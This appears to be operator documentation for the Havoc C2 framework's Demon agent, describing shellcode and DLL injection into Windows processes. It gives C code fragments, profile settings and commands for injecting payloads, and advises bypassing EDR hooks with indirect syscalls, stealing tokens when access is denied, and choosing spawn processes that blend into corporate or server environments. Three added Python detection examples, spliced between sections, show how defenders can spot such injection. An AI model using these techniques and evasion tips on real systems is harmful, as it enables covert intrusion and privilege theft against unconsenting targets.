
Overview

Demon supports multiple process injection techniques for executing shellcode or DLLs in remote processes. The injection system offers flexibility in choosing between stealthy syscall-based methods and faster Win32 API approaches.

Injection Methods

Demon distinguishes between two primary injection scenarios:

Inject

Inject code into an existing process by PID.
Requires:
  • Target process ID
  • Sufficient permissions
  • Compatible architecture

Spawn

Create a new sacrificial process and inject code (fork & run).
Advantages:
  • Controlled process environment
  • No target process required
  • Cleaner OPSEC

Injection Techniques

Technique 1: Win32 API

Value: INJECTION_TECHNIQUE_WIN32 (1)
Uses high-level Win32 APIs for injection operations.
Demon:
  Injection:
    Technique: 1
For Spawn:
  1. CreateProcessA - Create suspended process
Memory Operations:
  2. VirtualAllocEx - Allocate memory
  3. WriteProcessMemory - Write shellcode
  4. VirtualProtectEx - Change to RX protection
Thread Creation:
  5. CreateRemoteThread - Start execution
  6. ResumeThread - Resume main thread (if spawned)
Characteristics:
  • ✅ Fast and stable
  • ✅ Simple implementation
  • ✅ Compatible with all targets
  • ❌ Heavily hooked by EDR
  • ❌ High detection rate
  • ❌ Leaves obvious forensic traces
When to use:
  • Testing environments
  • No EDR present
  • Speed prioritized over stealth

Technique 2: Syscall

Value: INJECTION_TECHNIQUE_SYSCALL (2)
Recommended - Uses indirect syscalls to bypass userland hooks.
Demon:
  Injection:
    Technique: 2
For Spawn:
  1. CreateProcessA - Create suspended process (no syscall alternative)
Memory Operations:
  2. NtAllocateVirtualMemory* - Allocate memory
  3. NtWriteVirtualMemory* - Write shellcode
  4. NtProtectVirtualMemory* - Change to RX protection
Thread Creation:
  5. NtCreateThreadEx* - Start execution
  6. NtResumeThread* - Resume thread
* = Indirect syscall
Characteristics:
  • ✅ Bypasses userland EDR hooks
  • ✅ Stealthy execution
  • ✅ Production-ready
  • ✅ Return address spoofing available
  • ❌ Slightly slower than Win32
  • ❌ More complex implementation
When to use:
  • Production operations
  • EDR present
  • Stealth prioritized
Implementation Details:
// Memory allocation: indirect syscall or Win32, selected by the configured method
PVOID MmVirtualAlloc(
    DWORD  Method,
    HANDLE hProcess,
    SIZE_T Size,
    DWORD  Protection
) {
    PVOID    Address = NULL;   // receives the base address of the new region
    NTSTATUS Status;

    if (Method == DX_MEM_SYSCALL) {
        // NtAllocateVirtualMemory via indirect syscall (DX_MEM_SYSCALL)
        Status = SysNtAllocateVirtualMemory(
            hProcess,
            &Address,
            0,
            &Size,
            MEM_COMMIT | MEM_RESERVE,
            Protection
        );
        return NT_SUCCESS(Status) ? Address : NULL;
    } else {
        // Win32 path (DX_MEM_WIN32): VirtualAllocEx resolved through Instance->Win32
        return Instance->Win32.VirtualAllocEx(
            hProcess,
            NULL,
            Size,
            MEM_COMMIT | MEM_RESERVE,
            Protection
        );
    }
}
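Both technique tables above describe the same allocate, write, protect, create-thread chain against a remote process, and a sensor that observes those operations on the kernel side (which a userland hook bypass does not remove) can correlate them into one alert. The following is an added example, not Havoc/Demon code; the telemetry schema (ts, source_pid, target_pid, op, protect) and the op names are constructed for it.

```python
CHAIN = ("AllocRemote", "WriteRemote", "ProtectRemote", "CreateRemoteThread")
EXEC = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE",
        "PAGE_EXECUTE_WRITECOPY"}

def correlate(events, window=5.0):
    """One alert per (source, target) pair that completes CHAIN within `window` s.
    Covers both variants on this page: allocate RW then protect to RX, or
    allocate directly executable with no separate protect step."""
    state, alerts = {}, []
    for e in sorted(events, key=lambda x: x["ts"]):
        key, op = (e["source_pid"], e["target_pid"]), e["op"]
        st = state.get(key)
        if st is not None and e["ts"] - st["first"] > window:
            st = None                                   # stale chain, start over
        if st is None:
            if op == CHAIN[0]:                          # a chain begins at allocation
                state[key] = {"stage": 1, "first": e["ts"], "protect": e.get("protect")}
            continue
        if op == "ProtectRemote" and st["stage"] == 2:
            if e.get("protect") in EXEC:                # RW -> RX is the execute step
                st["protect"], st["stage"] = e["protect"], 3
        elif op == "CreateRemoteThread" and st["stage"] >= 2:
            if st["protect"] in EXEC:                   # region executable either way
                alerts.append({"source_pid": key[0], "target_pid": key[1],
                               "protect": st["protect"],
                               "rwx": st["protect"] == "PAGE_EXECUTE_READWRITE",
                               "elapsed": round(e["ts"] - st["first"], 3)})
            del state[key]
        elif op == CHAIN[st["stage"]]:                  # next expected step
            st["stage"] += 1
    return alerts

def event(ts, src, dst, op, protect=None):
    # Constructed telemetry record; the schema is this example's own
    return {"ts": ts, "source_pid": src, "target_pid": dst, "op": op, "protect": protect}

# Constructed sample: 4242 runs the RW -> RX chain against 1234, 5000 allocates
# RWX directly against 7777, and 900 only allocates and writes (no alert).
SAMPLE = [
    event(1.0, 4242, 1234, "AllocRemote", "PAGE_READWRITE"),
    event(1.1, 4242, 1234, "WriteRemote"),
    event(1.2, 4242, 1234, "ProtectRemote", "PAGE_EXECUTE_READ"),
    event(1.3, 4242, 1234, "CreateRemoteThread"),
    event(2.0, 5000, 7777, "AllocRemote", "PAGE_EXECUTE_READWRITE"),
    event(2.1, 5000, 7777, "WriteRemote"),
    event(2.2, 5000, 7777, "CreateRemoteThread"),
    event(3.0, 900, 1234, "AllocRemote", "PAGE_READWRITE"),
    event(3.1, 900, 1234, "WriteRemote"),
]
```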

Technique 3: APC Injection

Value: INJECTION_TECHNIQUE_APC (3)
Queues Asynchronous Procedure Calls (APCs) to existing threads.
Demon:
  Injection:
    Technique: 3
Process:
  1. NtAllocateVirtualMemory* - Allocate memory
  2. NtWriteVirtualMemory* - Write shellcode
  3. NtProtectVirtualMemory* - Set RX protection
  4. Enumerate threads in target process
  5. For each thread:
    • NtOpenThread* - Open thread
    • NtQueueApcThread* - Queue APC pointing to shellcode
  6. APCs execute when threads enter alertable wait state
Characteristics:
  • ✅ No new thread creation
  • ✅ Stealthy (uses existing threads)
  • ✅ Bypasses some thread creation monitoring
  • ❌ Requires alertable wait state
  • ❌ Execution timing unpredictable
  • ❌ May not execute immediately
When to use:
  • Target has alertable threads
  • Thread creation is monitored
  • Delayed execution acceptable
APC injection requires target threads to enter an alertable wait state. Execution may be delayed or may not occur if threads never wait alertably.

Thread Creation Methods

When creating threads in remote processes, Demon supports multiple methods:

DX_THREAD_WIN32

Uses CreateRemoteThread API.
HANDLE hThread = Instance->Win32.CreateRemoteThread(
    hProcess,
    NULL,
    0,
    EntryPoint,
    Parameter,
    0,
    &ThreadId
);
Pros: Simple, widely compatible
Cons: Heavily monitored by EDR

DX_THREAD_SYSCALL

Recommended - Uses NtCreateThreadEx via indirect syscall.
NTSTATUS status = SysNtCreateThreadEx(
    &hThread,
    THREAD_ALL_ACCESS,
    NULL,
    hProcess,
    EntryPoint,
    Parameter,
    FALSE,  // Not suspended
    0,
    0x1000 * 20,  // Stack size
    0x1000 * 20,  // Max stack
    NULL
);
Pros: Bypasses hooks, stealthy
Cons: Requires syscall infrastructure

DX_THREAD_APC

Queues an APC instead of creating a thread.
for (each thread in process) {
    HANDLE hThread = OpenThread(thread_id);
    NtQueueApcThread(
        hThread,
        EntryPoint,
        Parameter,
        NULL,
        NULL
    );
}
Pros: No thread creation, stealthy
Cons: Unreliable execution timing

Memory Allocation Methods

DX_MEM_WIN32

Uses VirtualAllocEx for memory operations.
LPVOID memory = Instance->Win32.VirtualAllocEx(
    hProcess,
    NULL,
    size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE
);
Configuration:
config memory alloc 1  # Win32

DX_MEM_SYSCALL

Recommended - Uses NtAllocateVirtualMemory via indirect syscall.
NTSTATUS status = SysNtAllocateVirtualMemory(
    hProcess,
    &address,
    0,
    &size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE
);
Configuration:
config memory alloc 2  # Syscall

Spawn Process Configuration

When using fork & run (spawn) techniques, Demon spawns a sacrificial process. Configure these in the profile or at runtime:

Profile Configuration

Demon:
  Injection:
    Spawn64: "C:\\Windows\\System32\\notepad.exe"
    Spawn32: "C:\\Windows\\SysWOW64\\notepad.exe"

Runtime Configuration

# Set x64 spawn process
config injection spawn64 C:\Windows\System32\dllhost.exe

# Set x86 spawn process  
config injection spawn32 C:\Windows\SysWOW64\dllhost.exe
notepad.exe (as in the profile example above):
  x64: C:\Windows\System32\notepad.exe
  x86: C:\Windows\SysWOW64\notepad.exe
  • ✅ Always available
  • ✅ Commonly spawned
  • ❌ GUI application (creates window)
Environment-Specific Choices:
  • Corporate: Use common business apps (outlook.exe, excel.exe)
  • Servers: Use service processes (w3wp.exe, svchost.exe)
  • Developer machines: Use dev tools (devenv.exe, msbuild.exe)

Command Usage

Shellcode Injection

Inject shellcode into an existing process:
shellcode inject [arch] [pid] [path]
Example:
shellcode inject x64 1234 /root/payload.bin
Process:
  1. Open handle to target process (PID 1234)
  2. Verify architecture matches
  3. Allocate memory based on configured method
  4. Write shellcode to allocated memory
  5. Change protection to PAGE_EXECUTE_READ
  6. Create thread at shellcode entry point

Shellcode Spawn

Spawn a new process and inject shellcode:
shellcode spawn [arch] [path]
Example:
shellcode spawn x64 /root/payload.bin
Process:
  1. Create configured spawn process in suspended state
  2. Allocate memory in new process
  3. Write shellcode
  4. Change protection to PAGE_EXECUTE_READ
  5. Create remote thread
  6. Resume main thread

DLL Injection

Inject a reflective DLL:
inject-dll [pid] [path]
Features:
  • Uses reflective loader
  • Supports DLL arguments
  • Returns output from DLL

OPSEC Considerations

Architecture Mismatch

Demon validates architecture before injection:
Same architecture (x64 to x64, x86 to x86): ✅ Supported. Full compatibility.
64-bit Demon into 32-bit target: ⚠️ Supported with limitations. Requires the Heaven's Gate technique for 64→32-bit transitions; not all injection methods work reliably.
32-bit Demon into 64-bit target: ❌ Not supported. A 32-bit process cannot inject into a 64-bit process. Error: INJECT_ERROR_PROCESS_ARCH_MISMATCH

Process Permissions

Injection requires specific permissions.
Minimum required:
  • PROCESS_VM_OPERATION - Memory operations
  • PROCESS_VM_WRITE - Write shellcode
  • PROCESS_CREATE_THREAD - Create execution thread
Opening process:
HANDLE hProcess = ProcessOpen(pid, PROCESS_ALL_ACCESS);
If access denied:
  1. Steal token with SeDebugPrivilege
  2. Impersonate SYSTEM or high-privileged user
  3. Retry injection
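Decoding the rights a handle was opened with is the defender's side of the permission list above: a ProcessAccess record whose mask contains all three minimum rights, or the PROCESS_ALL_ACCESS that ProcessOpen requests, is the one to look at first. Added example, not Havoc/Demon code; it assumes a flattened key=value rendering of Sysmon Event ID 10, uses the documented Windows access-right constants, and the log lines are constructed.

```python
import re

PROCESS_RIGHTS = {                          # documented Windows process access rights
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
INJECT_MIN = 0x0008 | 0x0020 | 0x0002       # VM_OPERATION | VM_WRITE | CREATE_THREAD
PROCESS_ALL_ACCESS = 0x1FFFFF               # value on Windows Vista and later

def decode_access(mask):
    """Names of the process-specific rights set in mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]

def classify(mask):
    """full = PROCESS_ALL_ACCESS, inject = minimum triad, partial = some of it."""
    if (mask & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
        return "full"
    if (mask & INJECT_MIN) == INJECT_MIN:
        return "inject"
    if mask & INJECT_MIN:
        return "partial"
    return "query"                           # no write/thread rights, e.g. 0x1000

FIELD = re.compile(r"(\w+)=(\S+)")

def triage(log_text):
    """Parse key=value ProcessAccess lines and return one verdict per record."""
    out = []
    for line in log_text.splitlines():
        f = dict(FIELD.findall(line))
        if "GrantedAccess" not in f:
            continue                         # not a ProcessAccess record
        mask = int(f["GrantedAccess"], 16)
        out.append({"source": f.get("SourceImage"), "target": f.get("TargetImage"),
                    "verdict": classify(mask), "rights": decode_access(mask)})
    return out

# Constructed sample in a flattened key=value rendering of Sysmon Event ID 10.
SAMPLE_LOG = """\
SourceImage=C:\\Users\\a\\update.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1FFFFF
SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\explorer.exe GrantedAccess=0x1000
SourceImage=C:\\tools\\agent.exe TargetImage=C:\\Windows\\System32\\dllhost.exe GrantedAccess=0x2A
"""
```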

Detection Vectors

Risk: EDR scans for suspicious memory patterns.
Indicators:
  • Unbacked memory regions (not from files)
  • RWX memory pages
  • Known shellcode signatures
  • Anomalous memory allocations
Mitigation:
  • Use RW during write, then change to RX
  • Encrypt shellcode before writing
  • Use existing executable memory regions
  • Avoid large contiguous allocations
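The indicators above can be checked against a process memory map regardless of whether a thread or a queued APC started the code, and the RW-then-RX mitigation removes the RWX indicator but leaves the region private and unbacked. Added example, not Havoc/Demon code; region and thread records are constructed to mimic what a VirtualQueryEx walk and a thread enumeration would return.

```python
EXEC = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE",
        "PAGE_EXECUTE_WRITECOPY"}

def region_findings(r):
    """Indicators for one region record (type, protect, base, size, mapped_file)."""
    f = []
    unbacked = r["type"] == "MEM_PRIVATE" and not r.get("mapped_file")
    if unbacked and r["protect"] in EXEC:
        f.append("unbacked-executable")      # still true after the RW -> RX change
    if r["protect"] == "PAGE_EXECUTE_READWRITE":
        f.append("rwx")
    if r["type"] == "MEM_IMAGE" and r["protect"] == "PAGE_EXECUTE_READWRITE":
        f.append("image-section-writable")   # patched or stomped module code
    return f

def containing(regions, addr):
    """Region whose [base, base+size) range holds addr, or None."""
    for r in regions:
        if r["base"] <= addr < r["base"] + r["size"]:
            return r
    return None

def scan(regions, threads):
    """Per-region findings plus threads whose start address is in flagged memory."""
    report = {"regions": [], "threads": []}
    for r in regions:
        f = region_findings(r)
        if f:
            report["regions"].append((hex(r["base"]), f))
    for t in threads:
        r = containing(regions, t["start"])
        if r is None or "unbacked-executable" in region_findings(r):
            report["threads"].append((t["tid"], hex(t["start"]),
                                      "no-region" if r is None else "start-in-unbacked"))
    return report

# Constructed sample: ntdll code (legitimate), a RW heap, a private RX region
# holding injected code, and a private RWX region.
REGIONS = [
    {"base": 0x7FF810000000, "size": 0x100000, "type": "MEM_IMAGE",
     "protect": "PAGE_EXECUTE_READ", "mapped_file": r"C:\Windows\System32\ntdll.dll"},
    {"base": 0x1E000000, "size": 0x40000, "type": "MEM_PRIVATE", "protect": "PAGE_READWRITE"},
    {"base": 0x2A000000, "size": 0x1000, "type": "MEM_PRIVATE", "protect": "PAGE_EXECUTE_READ"},
    {"base": 0x2B000000, "size": 0x2000, "type": "MEM_PRIVATE", "protect": "PAGE_EXECUTE_READWRITE"},
]
THREADS = [
    {"tid": 100, "start": 0x7FF810002A40},   # legitimate: starts inside ntdll
    {"tid": 200, "start": 0x2A000000},       # starts at the injected RX region
]
```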

Best Practices

1. Choose Appropriate Technique
  • Low security: Win32 (speed)
  • Medium security: Syscall
  • High security: Syscall + APC

2. Select Context-Appropriate Target
Match spawn process to environment:
  • Corporate: Business applications
  • Server: Service processes
  • Developer: Development tools

3. Verify Permissions
Ensure you have the necessary privileges:
token privs-get  # Enable all privileges
token getuid     # Verify current context

4. Test Architecture Compatibility
proc list  # Check target architecture
Ensure the architectures match before injecting.

5. Monitor for Detection
After injection:
  • Watch for process termination
  • Check callback success
  • Verify no alerts in target environment

Error Handling

Common Errors

Cause: Missing or invalid parameters
Check:
  • PID specified and valid
  • Shellcode path exists
  • Architecture specified correctly
Cause: Architecture incompatibility (INJECT_ERROR_PROCESS_ARCH_MISMATCH)
Solutions:
  • Use matching architecture payload
  • Target different process
  • Use x64 Demon for flexibility
Cause: Generic injection failure
Common reasons:
  • Insufficient permissions
  • Protected process (PPL)
  • Memory allocation failed
  • EDR blocked operation
Debug:
# Check privileges
token privs-list

# Try with elevated token
token steal [high_priv_pid]
token impersonate [id]

# Retry injection

Advanced Techniques

Module Stomping

Overwrite existing module memory instead of allocating new regions.
Advantages:
  • No suspicious unbacked memory
  • Appears as part of legitimate module
  • Thread starts in known module
Implementation: (Not built-in, requires custom BOF)

Process Hollowing

Create a process in a suspended state, unmap the original image, map the payload.
Advantages:
  • Process appears legitimate
  • No remote memory allocation
  • Complex to detect
Implementation: (Not built-in, requires custom BOF)

Thread Hijacking

Suspend a thread, modify its context to point to the shellcode, resume it.
Advantages:
  • No thread creation
  • Uses existing thread
  • Stealthy
Implementation: (Not built-in, requires custom BOF)

Configuration Reference

Profile Configuration

Demon:
  Injection:
    # Injection technique
    Technique: 2  # 1=Win32, 2=Syscall, 3=APC
    
    # Spawn processes
    Spawn64: "C:\\Windows\\System32\\dllhost.exe"
    Spawn32: "C:\\Windows\\SysWOW64\\dllhost.exe"

Runtime Configuration

# View current config
config

# Change injection technique
config injection technique 2

# Change memory allocation method
config memory alloc 2     # 1=Win32, 2=Syscall
config memory execute 2   # 1=Win32, 2=Syscall

# Change spawn processes
config injection spawn64 C:\Windows\System32\notepad.exe
config injection spawn32 C:\Windows\SysWOW64\notepad.exe

Next Steps

  • Sleep Obfuscation - Configure memory encryption during sleep
  • Features Overview - Explore all Demon capabilities
  • Command Reference - Complete command documentation
  • Generate Payloads - Create configured Demon agents
